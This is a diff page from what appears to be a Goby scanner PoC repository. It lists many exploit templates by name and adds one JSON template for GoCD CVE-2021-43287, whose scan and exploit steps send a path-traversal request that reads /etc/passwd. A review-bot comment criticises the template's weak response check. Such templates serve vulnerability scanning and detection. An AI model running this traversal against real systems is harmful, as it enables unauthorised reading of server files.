lib/goby/goby_pocs/GitLab_Graphql_Email_information_disclosure_CVE_2020_26413.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/GitLab_RCE_CVE-2021-22205.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Gitlab_RCE_CVE_2021_22205.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
1 + { 2 + "Name": "GoCD Arbitrary file reading CVE-2021-43287", 3 + "Level": "3", 4 + "Tags": [ 5 + "fileread" 6 + ], 7 + "GobyQuery": "title=\"Login - Go\"", 8 + "Description": "", 9 + "Product": "", 10 + "Homepage": "https://gobies.org/", 11 + "Author": "[email protected]", 12 + "Impact": "", 13 + "Recommendation": "", 14 + "References": [ 15 + "https://gobies.org/" 16 + ], 17 + "HasExp": true, 18 + "ExpParams": null, 19 + "ExpTips": { 20 + "Type": "", 21 + "Content": "" 22 + }, 23 + "ScanSteps": [ 24 + "AND", 25 + { 26 + "Request": { 27 + "method": "GET", 28 + "uri": "/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd", 29 + "follow_redirect": true, 30 + "header": null, 31 + "data_type": "text", 32 + "data": "", 33 + "set_variable": [] 34 + }, 35 + "ResponseTest": { 36 + "type": "group", 37 + "operation": "AND", 38 + "checks": [ 39 + { 40 + "type": "item", 41 + "variable": "$code", 42 + "operation": "==", 43 + "value": "200", 44 + "bz": "" 45 + }, 46 + { 47 + "type": "item", 48 + "variable": "$body", 49 + "operation": "contains", 50 + "value": "root", 51 + "bz": "" 52 + } 53 + ] 54 + }, 55 + "SetVariable": [ 56 + "output|lastbody|regex|" 57 + ] 58 + } 59 + ], 60 + "ExploitSteps": [ 61 + "AND", 62 + { 63 + "Request": { 64 + "method": "GET", 65 + "uri": "/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd", 66 + "follow_redirect": true, 67 + "header": null, 68 + "data_type": "text", 69 + "data": "", 70 + "set_variable": [] 71 + }, 72 + "ResponseTest": { 73 + "type": "group", 74 + "operation": "AND", 75 + "checks": [ 76 + { 77 + "type": "item", 78 + "variable": "$code", 79 + "operation": "==", 80 + "value": "200", 81 + "bz": "" 82 + }, 83 + { 84 + "type": "item", 85 + "variable": "$body", 86 + "operation": "contains", 87 + "value": "root", 88 + "bz": "" 89 + } 90 + ] 91 + }, 92 + "SetVariable": [ 93 + "output|lastbody|regex|" 94 + ] 95 + } 96 + ], 97 + "PostTime": "2022-07-15 22:05:52", 98 + 
"GobyVersion": "1.9.323" 99 + } -
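Review bot: The response test on new lines 46–52 accepts any 200 response whose body contains the bare string `root`, which an ordinary HTML or error page can also satisfy, so this check is likely to produce false positives in scan reports. Matching a passwd-format fragment instead, for example `"value": "root:x:0:0"` (to be confirmed against the systems in scope), would tie the finding to the file actually being returned. The file list on this page also shows an existing `GoCD_Unauthorized_Path_Traversal_CVE_2021_43287.json` for the same CVE, so this new file may report the same issue a second time under a different name.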
lib/goby/goby_pocs/GoCD_Unauthorized_Path_Traversal_CVE_2021_43287.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Grafana_Angularjs_Rendering_XSS_CVE_2021_41174.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Grafana_Arbitrary_file_read.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Grafana_Plugins_Arbitrary_File_Read.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Grafana_v8.x_Arbitrary_File_Read_CVE_2021_43798.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/H5S_CONSOLE_Video_Platform_GetSrc_Information_Leak_CNVD_2021_25919.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/H5S_Video_Platform_GetUserInfo_Info_Leak_CNVD_2021_35567.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/H5S_video_platform_GetSrc_information_leakage.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/H5S_video_platform_GetUserInfo_Account_password_leakage.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/HIKVISION 视频编码设备接入网关 任意文件下载.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/HIKVISION.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/HIKVISION_Video_coding_equipment_Download_any_file.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Hikvision_RCE_CVE_2021_36260.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Hikvision_Unauthenticated_RCE_CVE-2021-36260.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Hikvision_Video_Encoding_Device_Access_Gateway_Any_File_Download.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/HotelDruid_Hotel_Management_Software_v3.0.3_XSS_CVE_2022_26564.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Hsmedia_Hgateway_Default_account.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/IFW8_Enterprise_router_Password_leakage_.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/IFW8_Router_ROM_v4.31_Credential_Discovery_CVE_2019_16313.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/JQuery_1.7.2Version_site_foreground_arbitrary_file_download.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/JQuery_1.7.2_Filedownload.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Jellyfin_10.7.0_Unauthenticated_Abritrary_File_Read_CVE_2021_21402.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Jellyfin_10.7.2_SSRF_CVE-2021-29490.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Jellyfin_SSRF_CVE_2021_29490.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Jellyfin_prior_to_10.7.0_Unauthenticated_Arbitrary_File_Read_CVE_2021_21402.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Jetty_WEB_INF_FileRead_CVE_2021_28169.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Jetty_WEB_INF_FileRead_CVE_2021_34429.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/JinHe_OA_C6_Default_password.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/JinHe_OA_C6_download.jsp_Arbitrary_fileread.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/JingHe_OA_C6_Default_password.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Jinher_OA_C6_download.jsp_Arbitrary_file_read.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Jinshan_V8.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Jitong_EWEBS_Fileread.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Jitong_EWEBS_arbitrary_file_read.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/KEDACOM_MTS_transcoding_server_Arbitrary_file_download_CNVD_2020_48650.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/KEDACOM_MTS_transcoding_server_Fileread_CNVD_2020_48650.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Kingsoft_V8_Arbitrary_file_read.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Kingsoft_V8_Default_weak_password.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Kingsoft_V8_Terminal_Security_System_Default_Login_CNVD_2021_32425.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Kingsoft_V8_Terminal_Security_System_Fileread.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Kyan.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Kyan_Account_password_leak.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Kyan_design_account_password_disclosure.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Kyan_network_monitoring_device_account_password_leak.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Kyan_network_monitoring_device_run.php_RCE.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Kyan_run.php_RCE.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical